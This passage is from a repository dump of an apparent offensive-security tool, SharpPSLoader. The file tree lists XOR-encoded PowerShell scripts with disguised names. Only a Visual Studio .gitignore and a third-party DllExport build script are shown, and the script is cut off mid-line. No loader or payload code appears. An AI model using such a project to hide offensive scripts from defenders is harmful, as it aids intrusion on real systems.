├── .gitignore
├── DllExport.bat
├── README.md
├── SharpPSLoader.sln
├── SharpPSLoaderConsole
    ├── App.config
    ├── Program.cs
    ├── Properties
    │   ├── AssemblyInfo.cs
    │   ├── Resources.Designer.cs
    │   └── Resources.resx
    ├── Resources
    │   ├── arpPac.ps1.xor
    │   └── oodhoun.ps1.xor
    └── SharpPSLoaderConsole.csproj
├── SharpPSLoaderLibrary
    ├── Class1.cs
    ├── Properties
    │   ├── AssemblyInfo.cs
    │   ├── Resources.Designer.cs
    │   └── Resources.resx
    ├── Resources
    │   ├── arpPac.ps1.xor
    │   └── oodhoun.ps1.xor
    ├── SharpPSLoaderLibrary.csproj
    └── packages.config
└── images
    └── Sharppsloader-demo.gif


/.gitignore:
--------------------------------------------------------------------------------
  1 | ## Ignore Visual Studio temporary files, build results, and
  2 | ## files generated by popular Visual Studio add-ons.
  3 | ##
  4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
  5 | 
  6 | # User-specific files
  7 | *.rsuser
  8 | *.suo
  9 | *.user
 10 | *.userosscache
 11 | *.sln.docstates
 12 | 
 13 | # User-specific files (MonoDevelop/Xamarin Studio)
 14 | *.userprefs
 15 | 
 16 | # Mono auto generated files
 17 | mono_crash.*
 18 | 
 19 | # Build results
 20 | [Dd]ebug/
 21 | [Dd]ebugPublic/
 22 | [Rr]elease/
 23 | [Rr]eleases/
 24 | x64/
 25 | x86/
 26 | [Aa][Rr][Mm]/
 27 | [Aa][Rr][Mm]64/
 28 | bld/
 29 | [Bb]in/
 30 | [Oo]bj/
 31 | [Ll]og/
 32 | [Ll]ogs/
 33 | 
 34 | # Visual Studio 2015/2017 cache/options directory
 35 | .vs/
 36 | # Uncomment if you have tasks that create the project's static files in wwwroot
 37 | #wwwroot/
 38 | 
 39 | # Visual Studio 2017 auto generated files
 40 | Generated\ Files/
 41 | 
 42 | # MSTest test Results
 43 | [Tt]est[Rr]esult*/
 44 | [Bb]uild[Ll]og.*
 45 | 
 46 | # NUnit
 47 | *.VisualState.xml
 48 | TestResult.xml
 49 | nunit-*.xml
 50 | 
 51 | # Build Results of an ATL Project
 52 | [Dd]ebugPS/
 53 | [Rr]eleasePS/
 54 | dlldata.c
 55 | 
 56 | # Benchmark Results
 57 | BenchmarkDotNet.Artifacts/
 58 | 
 59 | # .NET Core
 60 | project.lock.json
 61 | project.fragment.lock.json
 62 | artifacts/
 63 | 
 64 | # StyleCop
 65 | StyleCopReport.xml
 66 | 
 67 | # Files built by Visual Studio
 68 | *_i.c
 69 | *_p.c
 70 | *_h.h
 71 | *.ilk
 72 | *.meta
 73 | *.obj
 74 | *.iobj
 75 | *.pch
 76 | *.pdb
 77 | *.ipdb
 78 | *.pgc
 79 | *.pgd
 80 | *.rsp
 81 | *.sbr
 82 | *.tlb
 83 | *.tli
 84 | *.tlh
 85 | *.tmp
 86 | *.tmp_proj
 87 | *_wpftmp.csproj
 88 | *.log
 89 | *.vspscc
 90 | *.vssscc
 91 | .builds
 92 | *.pidb
 93 | *.svclog
 94 | *.scc
 95 | 
 96 | # Chutzpah Test files
 97 | _Chutzpah*
 98 | 
 99 | # Visual C++ cache files
100 | ipch/
101 | *.aps
102 | *.ncb
103 | *.opendb
104 | *.opensdf
105 | *.sdf
106 | *.cachefile
107 | *.VC.db
108 | *.VC.VC.opendb
109 | 
110 | # Visual Studio profiler
111 | *.psess
112 | *.vsp
113 | *.vspx
114 | *.sap
115 | 
116 | # Visual Studio Trace Files
117 | *.e2e
118 | 
119 | # TFS 2012 Local Workspace
120 | $tf/
121 | 
122 | # Guidance Automation Toolkit
123 | *.gpState
124 | 
125 | # ReSharper is a .NET coding add-in
126 | _ReSharper*/
127 | *.[Rr]e[Ss]harper
128 | *.DotSettings.user
129 | 
130 | # TeamCity is a build add-in
131 | _TeamCity*
132 | 
133 | # DotCover is a Code Coverage Tool
134 | *.dotCover
135 | 
136 | # AxoCover is a Code Coverage Tool
137 | .axoCover/*
138 | !.axoCover/settings.json
139 | 
140 | # Visual Studio code coverage results
141 | *.coverage
142 | *.coveragexml
143 | 
144 | # NCrunch
145 | _NCrunch_*
146 | .*crunch*.local.xml
147 | nCrunchTemp_*
148 | 
149 | # MightyMoose
150 | *.mm.*
151 | AutoTest.Net/
152 | 
153 | # Web workbench (sass)
154 | .sass-cache/
155 | 
156 | # Installshield output folder
157 | [Ee]xpress/
158 | 
159 | # DocProject is a documentation generator add-in
160 | DocProject/buildhelp/
161 | DocProject/Help/*.HxT
162 | DocProject/Help/*.HxC
163 | DocProject/Help/*.hhc
164 | DocProject/Help/*.hhk
165 | DocProject/Help/*.hhp
166 | DocProject/Help/Html2
167 | DocProject/Help/html
168 | 
169 | # Click-Once directory
170 | publish/
171 | 
172 | # Publish Web Output
173 | *.[Pp]ublish.xml
174 | *.azurePubxml
175 | # Note: Comment the next line if you want to checkin your web deploy settings,
176 | # but database connection strings (with potential passwords) will be unencrypted
177 | *.pubxml
178 | *.publishproj
179 | 
180 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
181 | # checkin your Azure Web App publish settings, but sensitive information contained
182 | # in these scripts will be unencrypted
183 | PublishScripts/
184 | 
185 | # NuGet Packages
186 | *.nupkg
187 | # NuGet Symbol Packages
188 | *.snupkg
189 | # The packages folder can be ignored because of Package Restore
190 | **/[Pp]ackages/*
191 | # except build/, which is used as an MSBuild target.
192 | !**/[Pp]ackages/build/
193 | # Uncomment if necessary however generally it will be regenerated when needed
194 | #!**/[Pp]ackages/repositories.config
195 | # NuGet v3's project.json files produces more ignorable files
196 | *.nuget.props
197 | *.nuget.targets
198 | 
199 | # Microsoft Azure Build Output
200 | csx/
201 | *.build.csdef
202 | 
203 | # Microsoft Azure Emulator
204 | ecf/
205 | rcf/
206 | 
207 | # Windows Store app package directories and files
208 | AppPackages/
209 | BundleArtifacts/
210 | Package.StoreAssociation.xml
211 | _pkginfo.txt
212 | *.appx
213 | *.appxbundle
214 | *.appxupload
215 | 
216 | # Visual Studio cache files
217 | # files ending in .cache can be ignored
218 | *.[Cc]ache
219 | # but keep track of directories ending in .cache
220 | !?*.[Cc]ache/
221 | 
222 | # Others
223 | ClientBin/
224 | ~$*
225 | *~
226 | *.dbmdl
227 | *.dbproj.schemaview
228 | *.jfm
229 | *.pfx
230 | *.publishsettings
231 | orleans.codegen.cs
232 | 
233 | # Including strong name files can present a security risk
234 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
235 | #*.snk
236 | 
237 | # Since there are multiple workflows, uncomment next line to ignore bower_components
238 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
239 | #bower_components/
240 | 
241 | # RIA/Silverlight projects
242 | Generated_Code/
243 | 
244 | # Backup & report files from converting an old project file
245 | # to a newer Visual Studio version. Backup files are not needed,
246 | # because we have git ;-)
247 | _UpgradeReport_Files/
248 | Backup*/
249 | UpgradeLog*.XML
250 | UpgradeLog*.htm
251 | ServiceFabricBackup/
252 | *.rptproj.bak
253 | 
254 | # SQL Server files
255 | *.mdf
256 | *.ldf
257 | *.ndf
258 | 
259 | # Business Intelligence projects
260 | *.rdl.data
261 | *.bim.layout
262 | *.bim_*.settings
263 | *.rptproj.rsuser
264 | *- [Bb]ackup.rdl
265 | *- [Bb]ackup ([0-9]).rdl
266 | *- [Bb]ackup ([0-9][0-9]).rdl
267 | 
268 | # Microsoft Fakes
269 | FakesAssemblies/
270 | 
271 | # GhostDoc plugin setting file
272 | *.GhostDoc.xml
273 | 
274 | # Node.js Tools for Visual Studio
275 | .ntvs_analysis.dat
276 | node_modules/
277 | 
278 | # Visual Studio 6 build log
279 | *.plg
280 | 
281 | # Visual Studio 6 workspace options file
282 | *.opt
283 | 
284 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
285 | *.vbw
286 | 
287 | # Visual Studio LightSwitch build output
288 | **/*.HTMLClient/GeneratedArtifacts
289 | **/*.DesktopClient/GeneratedArtifacts
290 | **/*.DesktopClient/ModelManifest.xml
291 | **/*.Server/GeneratedArtifacts
292 | **/*.Server/ModelManifest.xml
293 | _Pvt_Extensions
294 | 
295 | # Paket dependency manager
296 | .paket/paket.exe
297 | paket-files/
298 | 
299 | # FAKE - F# Make
300 | .fake/
301 | 
302 | # CodeRush personal settings
303 | .cr/personal
304 | 
305 | # Python Tools for Visual Studio (PTVS)
306 | __pycache__/
307 | *.pyc
308 | 
309 | # Cake - Uncomment if you are using it
310 | # tools/**
311 | # !tools/packages.config
312 | 
313 | # Tabs Studio
314 | *.tss
315 | 
316 | # Telerik's JustMock configuration file
317 | *.jmconfig
318 | 
319 | # BizTalk build output
320 | *.btp.cs
321 | *.btm.cs
322 | *.odx.cs
323 | *.xsd.cs
324 | 
325 | # OpenCover UI analysis results
326 | OpenCover/
327 | 
328 | # Azure Stream Analytics local run output
329 | ASALocalRun/
330 | 
331 | # MSBuild Binary and Structured Log
332 | *.binlog
333 | 
334 | # NVidia Nsight GPU debugger configuration file
335 | *.nvuser
336 | 
337 | # MFractors (Xamarin productivity tool) working folder
338 | .mfractor/
339 | 
340 | # Local History for Visual Studio
341 | .localhistory/
342 | 
343 | # BeatPulse healthcheck temp database
344 | healthchecksdb
345 | 
346 | # Backup folder for Package Reference Convert tool in Visual Studio 2017
347 | MigrationBackup/
348 | 
349 | # Ionide (cross platform F# VS Code tools) working folder
350 | .ionide/
351 | 


--------------------------------------------------------------------------------
/DllExport.bat:
--------------------------------------------------------------------------------
  1 | @echo off
  2 | :: Copyright (c) 2016-2021  Denis Kuzmin [x-3F@outlook.com] github/3F
  3 | :: https://github.com/3F/DllExport
  4 | if "%~1"=="/?" goto bq
  5 | set "aa=%~dpnx0"
  6 | set ab=%*
  7 | set ac=%*
  8 | if defined ab (
  9 | if defined __p_call (
 10 | set ac=%ac:^^=^%
 11 | ) else (
 12 | set ab=%ab:^=^^%
 13 | )
 14 | )
 15 | set wMgrArgs=%ac%
 16 | set ad=%ab:!=^!%
 17 | setlocal enableDelayedExpansion
 18 | set "ae=^"
 19 | set "ad=!ad:%%=%%%%!"
 20 | set "ad=!ad:&=%%ae%%&!"
 21 | set "af=1.7.4"
 22 | set "wAction=Configure"
 23 | set "ag=DllExport"
 24 | set "ah=tools/net.r_eg.DllExport.Wizard.targets"
 25 | set "ai=packages"
 26 | set "aj=https://www.nuget.org/api/v2/package/"
 27 | set "ak=build_info.txt"
 28 | set "al=!aa!"
 29 | set "wRootPath=!cd!"
 30 | set /a wDxpOpt=0
 31 | set "am="
 32 | set "an="
 33 | set "ao="
 34 | set "ap="
 35 | set "aq="
 36 | set "ar="
 37 | set "as="
 38 | set "at="
 39 | set "au="
 40 | set "av="
 41 | set /a aw=0
 42 | if not defined ab (
 43 | if defined wAction goto br
 44 | goto bq
 45 | )
 46 | call :bs bk !ad! bl
 47 | goto bt
 48 | :bq
 49 | echo.
 50 | @echo .NET DllExport v1.7.4.29858+c1cc52f
 51 | @echo Copyright (c) 2009-2015  Robert Giesecke
 52 | @echo Copyright (c) 2016-2021  Denis Kuzmin ^<x-3F@outlook.com^> github/3F
 53 | echo.
 54 | echo MIT License
 55 | @echo https://github.com/3F/DllExport
 56 | echo Based on hMSBuild, MvsSln, +GetNuTool: https://github.com/3F
 57 | echo.
 58 | @echo.
 59 | @echo Usage: DllExport [args to DllExport] [args to GetNuTool] [args to hMSBuild]
 60 | echo ------
 61 | echo.
 62 | echo Arguments
 63 | echo ---------
 64 | echo -action {type} - Specified action for Wizard. Where {type}:
 65 | echo   * Configure - To configure DllExport for specific projects.
 66 | echo   * Update    - To update pkg reference for already configured projects.
 67 | echo   * Restore   - To restore configured DllExport.
 68 | echo   * Export    - To export configured projects data.
 69 | echo   * Recover   - To re-configure projects via predefined/exported data.
 70 | echo   * Unset     - To unset all data from specified projects.
 71 | echo   * Upgrade   - Aggregates an Update action with additions for upgrading.
 72 | echo.
 73 | echo -sln-dir {path}    - Path to directory with .sln files to be processed.
 74 | echo -sln-file {path}   - Optional predefined .sln file to be processed.
 75 | echo -metalib {path}    - Relative path to meta library.
 76 | echo -metacor {path}    - Relative path to meta core library.
 77 | echo -dxp-target {path} - Relative path to entrypoint wrapper of the main core.
 78 | echo -dxp-version {num} - Specific version of DllExport. Where {num}:
 79 | echo   * Versions: 1.7.3 ...
 80 | echo   * Keywords:
 81 | echo     `actual` - Unspecified local/latest remote version;
 82 | echo                ( Only if you know what you are doing )
 83 | echo.
 84 | echo -msb {path}           - Full path to specific msbuild.
 85 | echo -hMSBuild {args}      - Access to hMSBuild tool (packed) https://github.com/3F/hMSBuild
 86 | echo -packages {path}      - A common directory for packages.
 87 | echo -server {url}         - Url for searching remote packages.
 88 | echo -proxy {cfg}          - To use proxy. The format: [usr[:pwd]@]host[:port]
 89 | echo -pkg-link {uri}       - Direct link to package from the source via specified URI.
 90 | echo -force                - Aggressive behavior, e.g. like removing pkg when updating.
 91 | echo -no-mgr               - Do not use %~nx0 for automatic restore the remote package.
 92 | echo -mgr-up               - Updates %~nx0 to version from '-dxp-version'.
 93 | echo -wz-target {path}     - Relative path to entrypoint wrapper of the main wizard.
 94 | echo -pe-exp-list {module} - To list all available exports from PE32/PE32+ module.
 95 | echo -eng                  - Try to use english language for all build messages.
 96 | echo -GetNuTool {args}     - Access to GetNuTool (integrated) https://github.com/3F/GetNuTool
 97 | echo -debug                - To show additional information.
 98 | echo -version              - Displays version for which (together with) it was compiled.
 99 | echo -build-info           - Displays actual build information from selected DllExport.
100 | echo -help                 - Displays this help. Aliases: -help -h
101 | echo.
102 | echo Flags
103 | echo -----
104 | echo  __p_call - To use the call-type logic when invoking %~nx0
105 | echo.
106 | echo Samples
107 | echo -------
108 | echo DllExport -action Configure -force -pkg-link http://host/v1.7.3.nupkg
109 | echo DllExport -action Restore -sln-file "Conari.sln"
110 | echo DllExport -proxy guest:1234@10.0.2.15:7428 -action Configure
111 | echo.
112 | echo DllExport -mgr-up -dxp-version 1.7.3
113 | echo DllExport -action Upgrade -dxp-version 1.7.3
114 | echo.
115 | echo DllExport -GetNuTool /p:ngpackages="Conari;regXwild"
116 | echo DllExport -pe-exp-list bin\Debug\regXwild.dll
117 | goto bu
118 | :bt
119 | set /a ax=0
120 | :bv
121 | set ay=!bk[%ax%]!
122 | if [!ay!]==[-help] ( goto bq ) else if [!ay!]==[-h] ( goto bq ) else if [!ay!]==[-?] ( goto bq )
123 | if [!ay!]==[-debug] (
124 | set am=1
125 | goto bw
126 | ) else if [!ay!]==[-action] ( set /a "ax+=1" & call :bx bk[!ax!] v
127 | set wAction=!v!
128 | for %%g in (Restore, Configure, Update, Export, Recover, Unset, Upgrade, Default) do (
129 | if "!v!"=="%%g" goto bw
130 | )
131 | echo Unknown -action !v!
132 | exit/B 1
133 | ) else if [!ay!]==[-sln-dir] ( set /a "ax+=1" & call :bx bk[!ax!] v
134 | set wSlnDir=!v!
135 | goto bw
136 | ) else if [!ay!]==[-sln-file] ( set /a "ax+=1" & call :bx bk[!ax!] v
137 | set wSlnFile=!v!
138 | goto bw
139 | ) else if [!ay!]==[-metalib] ( set /a "ax+=1" & call :bx bk[!ax!] v
140 | set wMetaLib=!v!
141 | goto bw
142 | ) else if [!ay!]==[-metacor] ( set /a "ax+=1" & call :bx bk[!ax!] v
143 | set wMetaCor=!v!
144 | goto bw
145 | ) else if [!ay!]==[-dxp-target] ( set /a "ax+=1" & call :bx bk[!ax!] v
146 | set wDxpTarget=!v!
147 | goto bw
148 | ) else if [!ay!]==[-dxp-version] ( set /a "ax+=1" & call :bx bk[!ax!] v
149 | set af=!v!
150 | goto bw
151 | ) else if [!ay!]==[-msb] ( set /a "ax+=1" & call :bx bk[!ax!] v
152 | set ao=!v!
153 | goto bw
154 | ) else if [!ay!]==[-packages] ( set /a "ax+=1" & call :bx bk[!ax!] v
155 | set ai=!v!
156 | goto bw
157 | ) else if [!ay!]==[-server] ( set /a "ax+=1" & call :bx bk[!ax!] v
158 | set aj=!v!
159 | goto bw
160 | ) else if [!ay!]==[-proxy] ( set /a "ax+=1" & call :bx bk[!ax!] v
161 | set at=!v!
162 | set wProxy=!v!
163 | goto bw
164 | ) else if [!ay!]==[-pkg-link] ( set /a "ax+=1" & call :bx bk[!ax!] v
165 | set ap=!v!
166 | set af=!ay!
167 | goto bw
168 | ) else if [!ay!]==[-force] (
169 | set ar=1
170 | goto bw
171 | ) else if [!ay!]==[-no-mgr] (
172 | set /a wDxpOpt^|=1
173 | goto bw
174 | ) else if [!ay!]==[-mgr-up] (
175 | set as=1
176 | goto bw
177 | ) else if [!ay!]==[-wz-target] ( set /a "ax+=1" & call :bx bk[!ax!] v
178 | set ah=!v!
179 | goto bw
180 | ) else if [!ay!]==[-pe-exp-list] ( set /a "ax+=1" & call :bx bk[!ax!] v
181 | set aq=!v!
182 | goto bw
183 | ) else if [!ay!]==[-eng] (
184 | chcp 437 >nul
185 | goto bw
186 | ) else if [!ay!]==[-GetNuTool] (
187 | call :by -GetNuTool 10
188 | set /a aw=!ERRORLEVEL! & goto bu
189 | ) else if [!ay!]==[-hMSBuild] (
190 | set av=1 & goto br
191 | ) else if [!ay!]==[-version] (
192 | @echo v1.7.4.29858+c1cc52f  %__dxp_pv%
193 | goto bu
194 | ) else if [!ay!]==[-build-info] (
195 | set an=1
196 | goto bw
197 | ) else if [!ay!]==[-tests] ( set /a "ax+=1" & call :bx bk[!ax!] v
198 | set au=!v!
199 | goto bw
200 | ) else (
201 | echo Incorrect key: !ay!
202 | set /a aw=1
203 | goto bu
204 | )
205 | :bw
206 | set /a "ax+=1" & if %ax% LSS !bl! goto bv
207 | :br
208 | call :bz "dxpName = " ag
209 | call :bz "dxpVersion = " af
210 | call :bz "-sln-dir = " wSlnDir
211 | call :bz "-sln-file = " wSlnFile
212 | call :bz "-metalib = " wMetaLib
213 | call :bz "-metacor = " wMetaCor
214 | call :bz "-dxp-target = " wDxpTarget
215 | call :bz "-wz-target = " ah
216 | call :bz "#opt " wDxpOpt
217 | if defined af (
218 | if "!af!"=="actual" (
219 | set "af="
220 | )
221 | )
222 | set wPkgVer=!af!
223 | if z%wAction%==zUpgrade (
224 | call :bz "Upgrade is on"
225 | set as=1
226 | set ar=1
227 | )
228 | call :b0 ai
229 | set "ai=!ai!\\"
230 | set "az=!ag!"
231 | set "wPkgPath=!ai!!ag!"
232 | if defined af (
233 | set "az=!az!/!af!"
234 | set "wPkgPath=!wPkgPath!.!af!"
235 | )
236 | if defined ar (
237 | if exist "!wPkgPath!" (
238 | call :bz "Removing old version before continue. '-force' key rule. " wPkgPath
239 | rmdir /S/Q "!wPkgPath!"
240 | )
241 | )
242 | set a0="!wPkgPath!\\!ah!"
243 | call :bz "wPkgPath = " wPkgPath
244 | if not exist !a0! (
245 | if exist "!wPkgPath!" (
246 | call :bz "Trying to replace obsolete version ... " wPkgPath
247 | rmdir /S/Q "!wPkgPath!"
248 | )
249 | call :bz "-pkg-link = " ap
250 | call :bz "-server = " aj
251 | if defined ap (
252 | set aj=!ap!
253 | if "!aj::=!"=="!aj!" (
254 | set aj=!cd!/!aj!
255 | )
256 | if "!wPkgPath::=!"=="!wPkgPath!" (
257 | set "a1=../"
258 | )
259 | set "az=:!a1!!wPkgPath!|"
260 | )
261 | if defined ao (
262 | set a2=-msbuild "!ao!"
263 | )
264 | set a3=!a2! /p:ngserver="!aj!" /p:ngpackages="!az!" /p:ngpath="!ai!" /p:proxycfg="!at! "
265 | call :bz "GetNuTool call: " a3
266 | if defined am (
267 | call :b1 !a3!
268 | ) else (
269 | call :b1 !a3! >nul
270 | )
271 | )
272 | if defined av (
273 | call :by -hMSBuild 9
274 | set /a aw=!ERRORLEVEL! & goto bu
275 | )
276 | if defined aq (
277 | "!wPkgPath!\\tools\\PeViewer.exe" -list -pemodule "!aq!"
278 | set /a aw=%ERRORLEVEL%
279 | goto bu
280 | )
281 | if defined an (
282 | call :bz "buildInfo = " wPkgPath ak
283 | if not exist "!wPkgPath!\\!ak!" (
284 | echo information about build is not available.
285 | set /a aw=2
286 | goto bu
287 | )
288 | type "!wPkgPath!\\!ak!"
289 | goto bu
290 | )
291 | if not exist !a0! (
292 | echo Something went wrong. Try to use another keys.
293 | set /a aw=2
294 | goto bu
295 | )
296 | call :bz "wRootPath = " wRootPath
297 | call :bz "wAction = " wAction
298 | call :bz "wMgrArgs = " wMgrArgs
299 | if defined ao (
300 | call :bz "Use specific MSBuild tools: " ao
301 | set a4="!ao!"
302 | goto b2
303 | )
304 | call :b3 bm & set a4="!bm!"
305 | if "!ERRORLEVEL!"=="0" goto b2
306 | echo MSBuild tools was not found. Try with `-msb` key.
307 | set /a aw=2
308 | goto bu
309 | :b2
310 | if not defined a4 (
311 | echo Something went wrong. Use `-debug` key for details.
312 | set /a aw=2
313 | goto bu
314 | )
315 | if not defined au (
316 | if not defined ao if defined wPkgPath (
317 | set a4="!wPkgPath!\\hMSBuild"
318 | for /f "tokens=*" %%i in ('!a4! -version') do set a5=%%i
319 | call :b4 !a5! bn
320 | call :bz "hMSBuild -v" a5 bn
321 | if !bn! GEQ 230 (
322 | call :bz "2.3+"
323 | set a4=!a4! -vsw-as "-requiresAny -requires Microsoft.NetCore.Component.SDK Microsoft.Net.Core.Component.SDK -products * -latest -prerelease"
324 | )
325 | )
326 | call :bz "Target: " a4 a0
327 | call !a4! /nologo /v:m /m:4 !a0!
328 | )
329 | :bu
330 | if defined au (
331 | echo Running Tests ... "!au!"
332 | call :b3 bo
333 | "!bo!" /nologo /v:m /m:4 "!au!"
334 | exit/B 0
335 | )
336 | if defined as (
337 | (copy /B/Y "!wPkgPath!\\DllExport.bat" "!al!" > nul) && ( echo Manager has been updated. & exit/B 0 ) || ( (echo -mgr-up failed:!aw! 1>&2) & exit/B 1 )
338 | )
339 | exit/B !aw!
340 | :b4
341 | set a6=%~1
342 | for /f "tokens=1,2 delims=." %%a in ("!a6!") do (
343 | set _=%%b & set /a _*=10 & set /a %2=%%a!_!
344 | )
345 | exit/B 0
346 | :by
347 | set ay=%~1
348 | set /a a7=%~2
349 | call :bz "accessing to !ay! ..."
350 | for /L %%p IN (0,1,8181) DO (
351 | if "!ad:~%%p,%a7%!"=="!ay!" (
352 | set a8=!ad:~%%p!
353 | set a9=!a8:~%a7%!
354 | if defined av (
355 | call "!wPkgPath!\\hMSBuild" !a9!
356 | ) else (
357 | call :b1 !a9!
358 | )
359 | exit/B !ERRORLEVEL!
360 | )
361 | )
362 | call :bz "!ay! is corrupted: " ad
363 | exit/B 1
364 | :b3
365 | call :bz "Searching from .NET Framework - .NET 4.0, ..."
366 | for %%v in (4.0, 3.5, 2.0) do (
367 | call :b5 %%v Y & if defined Y (
368 | set %1=!Y!
369 | exit/B 0
370 | )
371 | )
372 | call :bz "msb -netfx: not found"
373 | set "%1="
374 | exit/B 2
375 | :b5
376 | call :bz "check %1"
377 | for /F "usebackq tokens=2* skip=2" %%a in (
378 | `reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSBuild\ToolsVersions\%1" /v MSBuildToolsPath 2^> nul`
379 | ) do if exist %%b (
380 | set a_=%%~b
381 | call :bz ":msbfound " a_
382 | call :b6 a_ bp
383 | set %2=!bp!
384 | exit/B 0
385 | )
386 | set "%2="
387 | exit/B 0
388 | :b6
389 | set %2=!%~1!\MSBuild.exe
390 | exit/B 0
391 | :bz
392 | if defined am (
393 | set ba=%1
394 | set ba=!ba:~0,-1!
395 | set ba=!ba:~1!
396 | echo.[%TIME% ] !ba! !%2! !%3!
397 | )
398 | exit/B 0
399 | :b0
400 | call :b7 %1
401 | call :b8 %1
402 | exit/B 0
403 | :b7
404 | call :b9 %1 "-=1"
405 | exit/B 0
406 | :b8
407 | call :b9 %1 "+=1"
408 | exit/B 0
409 | :b9
410 | set bb=z!%1!z
411 | if "%~2"=="-=1" (set "bc=1") else (set "bc=")
412 | if defined bc (
413 | set /a "i=-2"
414 | ) else (
415 | set /a "i=1"
416 | )
417 | :b_
418 | if "!bb:~%i%,1!"==" " (
419 | set /a "i%~2"
420 | goto b_
421 | )
422 | if defined bc set /a "i+=1"
423 | if defined bc (
424 | set "%1=!bb:~1,%i%!"
425 | ) else (
426 | set "%1=!bb:~%i%,-1!"
427 | )
428 | exit/B 0
429 | :bs
430 | set "bd=%~1"
431 | set /a ax=-1
432 | :ca
433 | set /a ax+=1
434 | set %bd%[!ax!]=%~2
435 | shift & if not "%~3"=="" goto ca
436 | set /a ax-=1
437 | set %1=!ax!
438 | exit/B 0
439 | :bx
440 | set %2=!%1!
441 | exit/B 0
442 | :b1
443 | setlocal disableDelayedExpansion
444 | @echo off
445 | :: GetNuTool - Executable version
446 | :: Copyright (c) 2015-2018,2020  Denis Kuzmin [ x-3F@outlook.com ]
447 | :: https://github.com/3F/GetNuTool
448 | set be=gnt.core
449 | set bf="%temp%\%random%%random%%be%"
450 | if "%~1"=="-unpack" goto cb
451 | set bg=%*
452 | if defined __p_call if defined bg set bg=%bg:^^=^%
453 | set bh=%__p_msb%
454 | if defined bh goto cc
455 | if "%~1"=="-msbuild" goto cd
456 | for %%v in (4.0, 14.0, 12.0, 3.5, 2.0) do (
457 | for /F "usebackq tokens=2* skip=2" %%a in (
458 | `reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSBuild\ToolsVersions\%%v" /v MSBuildToolsPath 2^> nul`
459 | ) do if exist %%b (
460 | set bh="%%~b\MSBuild.exe"
461 | goto cc
462 | )
463 | )
464 | echo MSBuild was not found. Try -msbuild "fullpath" args 1>&2
465 | exit/B 2
466 | :cd
467 | shift
468 | set bh=%1
469 | shift
470 | set bi=%bg:!= #__b_ECL## %
471 | setlocal enableDelayedExpansion
472 | set bi=!bi:%%=%%%%!
473 | :ce
474 | for /F "tokens=1* delims==" %%a in ("!bi!") do (
475 | if "%%~b"=="" (
476 | call :cf !bi!
477 | exit/B %ERRORLEVEL%
478 | )
479 | set bi=%%a #__b_EQ## %%b
480 | )
481 | goto ce
482 | :cf
483 | shift & shift
484 | set "bg="
485 | :cg
486 | set bg=!bg! %1
487 | shift & if not "%~2"=="" goto cg
488 | set bg=!bg: #__b_EQ## ==!
489 | setlocal disableDelayedExpansion
490 | set bg=%bg: #__b_ECL## =!%
491 | :cc
492 | call :ch
493 | call %bh% %bf% /nologo /p:wpath="%cd%/" /v:m /m:4 %bg%
494 | set "bh="
495 | set bj=%ERRORLEVEL%
496 | del /Q/F %bf%
497 | exit/B %bj%
498 | :cb
499 | set bf="%cd%\%be%"
500 | echo Generating minified version in %bf% ...
501 | :ch
502 | <nul set /P ="">%bf%
503 | set a=PropertyGroup&set b=Condition&set c=ngpackages&set d=Target&set e=DependsOnTargets&set f=TaskCoreDllPath&set g=MSBuildToolsPath&set h=UsingTask&set i=CodeTaskFactory&set j=ParameterGroup&set k=Reference&set l=Include&set m=System&set n=Using&set o=Namespace&set p=IsNullOrEmpty&set q=return&set r=string&set s=delegate&set t=foreach&set u=WriteLine&set v=Combine&set w=Console.WriteLine&set x=Directory&set y=GetNuTool&set z=StringComparison&set _=EXT_NUSPEC
504 | <nul set /P =^<!-- GetNuTool - github.com/3F/GetNuTool --^>^<!-- Copyright (c) 2015-2018,2020  Denis Kuzmin [ x-3F@outlook.com ] --^>^<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"^>^<%a%^>^<ngconfig %b%="'$(ngconfig)'==''"^>packages.config^</ngconfig^>^<ngserver %b%="'$(ngserver)'==''"^>https://www.nuget.org/api/v2/package/^</ngserver^>^<%c% %b%="'$(%c%)'==''"^>^</%c%^>^<ngpath %b%="'$(ngpath)'==''"^>packages^</ngpath^>^</%a%^>^<%d% Name="get" BeforeTargets="Build" %e%="header"^>^<a^>^<Output PropertyName="plist" TaskParameter="Result"/^>^</a^>^<b plist="$(plist)"/^>^</%d%^>^<%d% Name="pack" %e%="header"^>^<c/^>^</%d%^>^<%a%^>^<%f% %b%="Exists('$(%g%)\Microsoft.Build.Tasks.v$(MSBuildToolsVersion).dll')"^>$(%g%)\Microsoft.Build.Tasks.v$(MSBuildToolsVersion).dll^</%f%^>^<%f% %b%="'$(%f%)'=='' and Exists('$(%g%)\Microsoft.Build.Tasks.Core.dll')"^>$(%g%)\Microsoft.Build.Tasks.Core.dll^</%f%^>^</%a%^>^<%h% TaskName="a" TaskFactory="%i%" AssemblyFile="$(%f%)"^>^<%j%^>^<Result Output="true"/^>^</%j%^>^<Task^>^<%k% %l%="%m%.Xml"/^>^<%k% %l%="%m%.Xml.Linq"/^>^<%n% %o%="%m%"/^>^<%n% %o%="%m%.Collections.Generic"/^>^<%n% %o%="%m%.IO"/^>^<%n% %o%="%m%.Xml.Linq"/^>^<Code Type="Fragment" Language="cs"^>^<![CDATA[var a=@"$(ngconfig)";var b=@"$(%c%)";var c=@"$(wpath)";if(!String.%p%(b)){Result=b;%q% true;}var d=Console.Error;Action^<%r%,Queue^<%r%^>^>e=%s%(%r% f,Queue^<%r%^>g){%t%(var h in XDocument.Load(f).Descendants("package")){var i=h.Attribute("id");var j=h.Attribute("version");var k=h.Attribute("output");if(i==null){d.%u%("'id' does not exist in '{0}'",f);%q%;}var l=i.Value;if(j!=null){l+="/"+j.Value;}if(k!=null){g.Enqueue(l+":"+k.Value);continue;}g.Enqueue(l);}};var m=new Queue^<%r%^>();%t%(var f in a.Split(new char[]{a.IndexOf('^|')!=-1?'^|':';'},(StringSplitOptions)1))>>%bf%
